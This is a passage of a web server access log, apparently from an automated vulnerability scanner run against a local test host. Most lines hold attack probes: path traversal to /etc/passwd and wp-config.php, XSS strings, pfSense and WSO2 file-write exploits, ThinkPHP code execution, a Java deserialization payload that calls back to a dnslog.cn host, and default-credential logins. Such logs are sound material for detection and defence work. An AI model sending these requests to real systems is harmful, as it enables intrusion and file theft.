"13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nbproject/project.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emergency.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/GetSrvInfo.exe HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /virtualems/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/?uid=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.008","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/SOAPService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x5Cx3c\x5Cx3fphp+var_dump(md5(\x5Cx27CVE-2021-41282\x5Cx27));unlink(__FILE__)\x5Cx3b\x5Cx3f\x5Cx3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compress.php?file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /VirtualEms/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /JavaScriptServlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/297MFhk2JMinQW3365XHMUc4ucC/)%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/support/stores/test_grid_filter.php?query=phpinfo(); HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Forms/rpAuth_1?id=
HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/ui/auth/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-----------------------------250033711231076532771336998311\x0D\x0AContent-Disposition: form-data; name=\x22../../../../repository/deployment/server/webapps/authenticationendpoint/297mfix4ux8rvsphpjjocckc8cr.jsp\x22;filename=\x22test.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<% out.print(\x22WSO2-RCE-CVE-2022-29464\x22); %>\x0D\x0A-----------------------------250033711231076532771336998311--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileupload/toolsAny HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::1]' UNION SELECT '/","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0AwmuUploadFiles\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_nonce\x22\x0D\x0A\x0D\x0A{{wmuSecurity}}\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmuAttachmentsData\x22\x0D\x0A\x0D\x0Aundefined\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_files[0]\x22; filename=\x22rce.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\xFF\xD8\xFF\xE1jExifMM*\xFD\xFD\xFDi\xFD\xFD>\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xA8\xFD\xFD\xFD\xFD\xC0\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFF\xE0\xFDJFIF\xFD\xFD\xFD\xFD\xFF\xDBC\xFD\xFD\x0C\xFD\x0C\x0A\xFD\xFD\x0D\x0A\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22postId\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cruise_config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /img/../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationendpoint/297mfix4ux8rvsphpjjocckc8cr.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"errorpage=/etc/passwd&obj-action=auth&:action=login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/webproc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"\x5Cx00", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/tmindex.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/lti/auth.php?redirect_uri=javascript:alert('297MFmsebaBDY4mr1sfx2q8uX9r') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws/v1/cluster/apps/new-application HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php?page=vfb-export HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/wp-admin/admin.php?page=vfb-export", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com 